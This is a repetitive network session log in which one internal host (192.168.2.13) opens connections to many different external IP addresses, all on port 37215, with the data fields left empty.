                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11386192.168.2.1357712157.213.152.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11387192.168.2.1339020157.53.54.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11388192.168.2.1350160165.17.102.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11389192.168.2.1337140157.111.154.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11390192.168.2.1357338197.45.216.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11391192.168.2.1351440190.155.212.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11392192.168.2.1358690157.203.100.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11393192.168.2.1342578157.147.132.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11394192.168.2.1344868197.58.195.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11395192.168.2.1345408197.221.194.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11396192.168.2.1336258157.81.41.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11397192.168.2.1338782157.116.203.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11398192.168.2.135603684.209.153.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11399192.168.2.1337006197.131.160.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11400192.168.2.133447041.132.185.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11401192.168.2.1349844197.73.234.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11402192.168.2.1344182157.59.105.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11403192.168.2.1355028157.52.242.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11404192.168.2.134438841.154.199.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11405192.168.2.1341478114.220.79.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11406192.168.2.1347112153.201.102.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11407192.168.2.133631441.160.9.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11408192.168.2.1346400171.150.48.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11409192.168.2.1351128157.251.125.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11410192.168.2.1336716157.97.133.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11411192.168.2.133957241.133.191.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11412192.168.2.134328041.220.252.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11413192.168.2.1349748141.253.159.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11414192.168.2.1337140194.222.59.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11415192.168.2.1350218192.193.28.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11416192.168.2.1343830197.183.189.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11417192.168.2.1342910171.28.155.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11418192.168.2.1353490122.56.241.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11419192.168.2.135501241.233.41.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11420192.168.2.1337538197.226.181.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11421192.168.2.1343064197.243.226.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11422192.168.2.1339844175.211.185.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11423192.168.2.1338808197.183.126.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11424192.168.2.1336044197.18.85.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11425192.168.2.134877073.113.154.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11426192.168.2.1353064197.106.168.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11427192.168.2.133833641.57.47.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11428192.168.2.1335180157.23.142.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11429192.168.2.134435041.30.230.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11430192.168.2.1338034197.104.253.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11431192.168.2.133789041.11.17.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11432192.168.2.135032241.196.106.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11433192.168.2.134752841.232.33.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11434192.168.2.1344494157.68.210.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11435192.168.2.1342224197.246.119.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11436192.168.2.1336952197.197.131.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11437192.168.2.1346330157.85.35.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11438192.168.2.1357104148.48.79.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11439192.168.2.1352426197.231.175.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11440192.168.2.1349126197.51.107.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11441192.168.2.134773041.69.63.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11442192.168.2.1334908116.223.203.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11443192.168.2.1346814197.67.176.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11444192.168.2.133452041.112.137.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11445192.168.2.1356122197.85.127.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11446192.168.2.134485481.191.62.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11447192.168.2.1360464197.237.48.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11448192.168.2.1350266169.35.222.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11449192.168.2.1347106113.25.123.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11450192.168.2.1353170197.72.222.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11451192.168.2.134372441.100.165.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11452192.168.2.1348780157.235.234.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11453192.168.2.133715641.27.104.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11454192.168.2.1358272197.15.113.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11455192.168.2.1345026107.242.253.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11456192.168.2.1353484137.43.178.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11457192.168.2.1344016157.66.107.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11458192.168.2.1360968157.190.219.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11459192.168.2.1347726173.159.6.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11460192.168.2.1345990197.175.3.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11461192.168.2.134402441.110.74.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11462192.168.2.1341428197.7.125.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11463192.168.2.134375841.177.157.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11464192.168.2.1341770197.160.175.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11465192.168.2.1334668222.249.175.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11466192.168.2.1348710176.200.78.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11467192.168.2.1337060197.196.123.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11468192.168.2.134454841.86.143.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11469192.168.2.1352472197.42.176.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11470192.168.2.135797041.65.215.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11471192.168.2.135885081.172.118.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11472192.168.2.1342962103.20.57.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11473192.168.2.1335952197.176.69.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11474192.168.2.1349044223.64.228.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11475192.168.2.135138041.53.83.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11476192.168.2.1341864157.2.18.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11477192.168.2.1348226104.198.246.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11478192.168.2.1354934157.130.55.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11479192.168.2.1352464170.83.185.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11480192.168.2.135752641.190.73.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11481192.168.2.1348570197.145.97.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11482192.168.2.134106241.189.88.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11483192.168.2.1341598197.126.54.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11484192.168.2.1338616157.112.77.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11485192.168.2.133755490.239.132.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11486192.168.2.1340990197.8.181.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11487192.168.2.1355858199.184.49.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11488192.168.2.1337258219.2.22.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11489192.168.2.135333249.147.250.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11490192.168.2.1346506197.238.215.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11491192.168.2.1344992197.213.51.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11492192.168.2.1355720157.12.142.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11493192.168.2.1358912157.99.251.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11494192.168.2.133890641.14.13.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11495192.168.2.135705041.175.36.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11496192.168.2.1356504197.101.212.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11497192.168.2.1353302197.59.76.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11498192.168.2.1341728191.176.63.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11499192.168.2.134998841.32.207.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11500192.168.2.1343688157.128.205.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11501192.168.2.1342628101.228.241.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11502192.168.2.1344448157.61.114.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11503192.168.2.1333114157.87.244.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11504192.168.2.1345114197.127.249.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11505192.168.2.135154841.161.210.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11506192.168.2.1339576197.21.127.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11507192.168.2.1340308157.192.128.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11508192.168.2.135337071.117.227.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11509192.168.2.1353978197.26.4.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11510192.168.2.1342708128.145.229.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11511192.168.2.1342210157.144.129.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11512192.168.2.1355418157.54.84.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11513192.168.2.1356854197.221.135.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11514192.168.2.133344441.59.92.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11515192.168.2.1355446157.141.118.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11516192.168.2.1342908162.140.148.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11517192.168.2.1343512170.151.188.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11518192.168.2.1336930157.125.125.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11519192.168.2.1339120122.18.31.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11520192.168.2.133625241.189.160.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11521192.168.2.1351286197.83.194.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11522192.168.2.1340480167.148.77.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11523192.168.2.1342404197.251.61.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11524192.168.2.1351678157.136.232.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11525192.168.2.135707041.66.61.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11526192.168.2.135824491.223.138.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11527192.168.2.1348612133.122.48.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11528192.168.2.1348570197.43.90.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11529192.168.2.133807841.16.149.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11530192.168.2.135602039.128.76.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11531192.168.2.1341916157.164.175.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11532192.168.2.1354880157.78.227.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11533192.168.2.1359348135.4.25.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11534192.168.2.1342058193.95.48.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11535192.168.2.1359120157.192.164.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11536192.168.2.1343768157.183.127.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11537192.168.2.1356982157.209.139.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11538192.168.2.1338062197.154.55.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11539192.168.2.133884841.118.245.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11540192.168.2.1338968197.133.110.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11541192.168.2.1357700197.235.210.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11542192.168.2.135170241.254.201.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11543192.168.2.1341708157.193.15.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11544192.168.2.1350660197.185.208.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11545192.168.2.134164041.73.161.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11546192.168.2.1339284161.195.104.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11547192.168.2.1335662157.173.81.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11548192.168.2.1352858145.153.87.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11549192.168.2.133516441.214.154.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11550192.168.2.1349930221.4.91.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11551192.168.2.1339182131.87.73.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11552192.168.2.1352414189.209.202.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11553192.168.2.134943041.44.83.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11554192.168.2.134783441.4.221.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11555192.168.2.1341450197.214.207.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11556192.168.2.1355446157.244.99.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11557192.168.2.1347776197.225.122.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11558192.168.2.1335906171.214.234.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11559192.168.2.133698241.236.203.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11560192.168.2.1339622172.142.94.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11561192.168.2.134581219.80.20.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11562192.168.2.1357304157.6.21.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11563192.168.2.1345086197.126.83.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11564192.168.2.134328468.0.125.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11565192.168.2.1334122143.91.69.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11566192.168.2.1348070157.187.119.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11567192.168.2.1338788197.184.191.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11568192.168.2.1342538157.173.252.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11569192.168.2.1345146157.223.17.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11570192.168.2.1342396157.132.201.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11571192.168.2.1332826197.156.90.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11572192.168.2.134978641.192.206.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11573192.168.2.1358014197.246.240.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11574192.168.2.1340458157.250.173.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11575192.168.2.1358450149.44.206.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11576192.168.2.134787441.88.12.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11577192.168.2.134706679.86.204.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11578192.168.2.1342718157.88.109.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11579192.168.2.135700041.12.184.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11580192.168.2.133864043.252.167.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11581192.168.2.1352608157.221.142.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11582192.168.2.1353654197.249.150.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11583192.168.2.1359410162.21.165.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11584192.168.2.135203441.205.9.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11585192.168.2.134188041.221.244.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11586192.168.2.1354354197.55.245.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11587192.168.2.134164641.158.18.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11588192.168.2.1353600197.97.0.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11589192.168.2.1347546160.19.66.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11590192.168.2.1347468197.184.209.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11591192.168.2.1357206197.237.112.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11592192.168.2.1344840197.129.255.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11593192.168.2.134868041.183.139.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11594192.168.2.1347170197.130.134.14437215
                                                  TimestampBytes transferredDirectionData


